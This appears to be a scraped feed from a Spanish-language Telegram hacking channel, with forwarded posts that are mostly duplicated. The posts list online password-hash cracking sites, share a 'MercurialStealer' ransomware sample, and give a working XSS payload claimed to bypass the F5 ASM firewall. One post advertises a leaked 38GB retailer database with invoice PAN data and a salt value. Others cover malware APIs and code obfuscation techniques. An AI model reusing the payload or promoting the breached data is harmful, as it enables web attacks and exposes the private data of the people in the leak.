Forwarded from Deleted Account
🍀 Online Password Crackers 🍀
https://hashkiller.io
https://www.cmd5.org/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://passwordrecovery.io/
http://cracker.offensive-security.com/
●▬۩❁ @geeekgirls ❁۩▬●
https://hashkiller.io
https://www.cmd5.org/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://passwordrecovery.io/
http://cracker.offensive-security.com/
●▬۩❁ @geeekgirls ❁۩▬●
www.cmd5.org
Cmd5 - MD5 Online ,MD5 Decryption, MD5 Hash Decoder
Welcome to the project designed to md5 decrypt, This website contains the largest database in the world.
We have a total of just over 20.408 trillion unique hashes.
We have a total of just over 20.408 trillion unique hashes.
Forwarded from PrOFeSoR X - Malware analisis
MercurialStealer.7z
911.5 KB
MercurialStealer Ransomware - Sample 👍
Forwarded from Deleted Account
Un payload XSS que permite saltarnos F5 ASM.
@str0d
str0d"/><style>
@KeyframeS
x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str>
°°°°°°°°°°°°°°°°°°
👍 #x25hackingnews #xss #hacking
@str0d
str0d"/><style>
@KeyframeS
x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str>
°°°°°°°°°°°°°°°°°°
👍 #x25hackingnews #xss #hacking
Forwarded from Burp Suite para pentesters
Un desensamblador de código de bytes de Python que ayuda a los ingenieros inversos a diseccionar binarios de Python al desensamblar y analizar los archivos de código de bytes (.pyc) de Python compilados en todas las versiones de Python (incluida Python 3.10.*)
👇👇👇👇👇👇👇👇👇
👇👇👇👇👇👇👇👇👇
Forwarded from Burp Suite para pentesters
GitHub
GitHub - knight0x07/pyc2bytecode: A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling…
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including...
Forwarded from Deleted Account
Este sitio ah sido hackeado y puesta en internet su base de datos y código fuente
+((++++++++
ABFRL DB + Source code & Invoice (PAN)
++++++++++
Si quieres conocer más a cerca de ADITYA
👇
Source: https://www.abfrl.com/about/
Wikipedia:
--------------- https://en.wikipedia.org/wiki/Aditya_Birla_Fashion_and_Retail
DB | size - 38GB
MD5-Salt: S8wcfPqfN2HTmMCG1O0f5LDGN1XnfYqvuGTYZE2FR0qkT1LKmvuuHc1R
S#LEAK 👍
+((++++++++
ABFRL DB + Source code & Invoice (PAN)
++++++++++
Si quieres conocer más a cerca de ADITYA
👇
Source: https://www.abfrl.com/about/
Wikipedia:
--------------- https://en.wikipedia.org/wiki/Aditya_Birla_Fashion_and_Retail
DB | size - 38GB
MD5-Salt: S8wcfPqfN2HTmMCG1O0f5LDGN1XnfYqvuGTYZE2FR0qkT1LKmvuuHc1R
S#LEAK 👍
Forwarded from PrOFeSoR X - Malware analisis
Two REvil Member's Detenidos y puestos en el bote.
--------------
Por eso sres a cuidarse si hace cosas malas.
°°°°°°°°°°°°°
#Vxundergound info
--------------
Por eso sres a cuidarse si hace cosas malas.
°°°°°°°°°°°°°
#Vxundergound info
Forwarded from PrOFeSoR X - Malware analisis
PERO YA SABEN 1001 RAT TOOLS para testing 👍
°°°°°°°°°°°°°°°°°°°°°==°°°
https://github.com/search?q=remote+administration+tools&type=
°°°°°°°°°°°°°°°°°°°°°==°°°
https://github.com/search?q=remote+administration+tools&type=
GitHub
GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.
Forwarded from Burp Suite para pentesters
Muchos me han preguntado
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Cuáles serían las API de sistema operativo que usan más los malware?
Bueno pues sobre esto les podría decir lo siguiente.
Las 10 APIs más utilizadas, con un gran escalón respecto al resto, son las siguientes:
#1 GetProcAddress
#2 LoadLibraryA
#3 GetModuleHandleA
#4 ExitProcess
#5 VirtualAlloc
#6 WriteFile
#7 GetModuleFileNameA
#8 CloseHandle
#9 RegCloseKey
#10 VirtualFree
#11 WinInet
+++++++++++
Ya les puse 11 pero bueno estás según eh visto son las más usadas,. Cabe aclarar que hay más .
En breve daremos varios ejemplos de su uso en los malware.
#x25hackingnews #Pr@fEsOrX #forensia
👍👌
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Cuáles serían las API de sistema operativo que usan más los malware?
Bueno pues sobre esto les podría decir lo siguiente.
Las 10 APIs más utilizadas, con un gran escalón respecto al resto, son las siguientes:
#1 GetProcAddress
#2 LoadLibraryA
#3 GetModuleHandleA
#4 ExitProcess
#5 VirtualAlloc
#6 WriteFile
#7 GetModuleFileNameA
#8 CloseHandle
#9 RegCloseKey
#10 VirtualFree
#11 WinInet
+++++++++++
Ya les puse 11 pero bueno estás según eh visto son las más usadas,. Cabe aclarar que hay más .
#x25hackingnews #Pr@fEsOrX #forensia
👍👌
Forwarded from PrOFeSoR X - Malware analisis
MUCHOS ME HAN PREGUNTADO no. 2
###############
Cuántos métodos existen de ofuscación de código?
👉 Sobre esto les podría decir basados en lo que he hecho en cuestión de ofuscación de código como sistemas de protección de software y malware.
°°°°°°°°°°°°°°°°°°°°
NOTA: Aquí solo pondré las técnicas, si gustan leer más de ellas, los invito a qué visiten mi blog.
----------_-----------
👉 1.- • Cifrado de cadenas (codificar cadenas en el programa).
👉 2.- • Descifrado en línea (descifra las cadenas cifradas.
👉 3.- • Control de flujo (modificando los métodos dentro del código para que los descompiladores no puedan descompilar los métodos).
👉 4.- • Confusión de enteros (esta opción agregará cálculos dentro de todos los enteros).
👉 5.- • Cálculos matemáticos (esto agrega aritmética dentro de todas las constantes).
👉 6.- • Campos constantes (convierte todas las constantes en los campos con nombres seleccionados al azar).
👉 7.- • Campos locales (convierte todos los locales en campos con nombres seleccionados al azar).
👉 8.- • Calli Conversion (convierte todas las llamadas y cálculos en cálculos de calli, lo cual hace que sea más difícil identificar fácilmente qué está haciendo la función.
👉 9.- • Cadenas de proxy (oculta las referencias de cadenas a las que se hizo referencia a un tipo, método o campo).
👉 10.- • Constantes de proxy (oculta las referencias constantes a las que se hizo referencia a un tipo, método o campo).
👉 11.- • Si quieren ver las demás visiten mi blog ahí vienen explicadas. 😁
https://rodolfohbaz.blogspot.com/2020/12/20-tecnicas-de-ofuscacion-usadas-en.html
--------------------------
Estas son algunas de las técnicas que se pueden usar en combinación para hacer mas difícil el crackeo de programas .net con ofuscación de código.
#x25hackingnews #profesorx #wjethackingtools
###############
Cuántos métodos existen de ofuscación de código?
👉 Sobre esto les podría decir basados en lo que he hecho en cuestión de ofuscación de código como sistemas de protección de software y malware.
°°°°°°°°°°°°°°°°°°°°
NOTA: Aquí solo pondré las técnicas, si gustan leer más de ellas, los invito a qué visiten mi blog.
----------_-----------
👉 1.- • Cifrado de cadenas (codificar cadenas en el programa).
👉 2.- • Descifrado en línea (descifra las cadenas cifradas.
👉 3.- • Control de flujo (modificando los métodos dentro del código para que los descompiladores no puedan descompilar los métodos).
👉 4.- • Confusión de enteros (esta opción agregará cálculos dentro de todos los enteros).
👉 5.- • Cálculos matemáticos (esto agrega aritmética dentro de todas las constantes).
👉 6.- • Campos constantes (convierte todas las constantes en los campos con nombres seleccionados al azar).
👉 7.- • Campos locales (convierte todos los locales en campos con nombres seleccionados al azar).
👉 8.- • Calli Conversion (convierte todas las llamadas y cálculos en cálculos de calli, lo cual hace que sea más difícil identificar fácilmente qué está haciendo la función.
👉 9.- • Cadenas de proxy (oculta las referencias de cadenas a las que se hizo referencia a un tipo, método o campo).
👉 10.- • Constantes de proxy (oculta las referencias constantes a las que se hizo referencia a un tipo, método o campo).
👉 11.- • Si quieren ver las demás visiten mi blog ahí vienen explicadas. 😁
https://rodolfohbaz.blogspot.com/2020/12/20-tecnicas-de-ofuscacion-usadas-en.html
--------------------------
Estas son algunas de las técnicas que se pueden usar en combinación para hacer mas difícil el crackeo de programas .net con ofuscación de código.
#x25hackingnews #profesorx #wjethackingtools
Blogspot
20 Técnicas de ofuscación usadas en código .NET
1.- • Cifrado de cadenas (codificar cadenas en el programa). 2.- • Descifrado en línea (descifra las cadenas cifradas. 3.- • Control...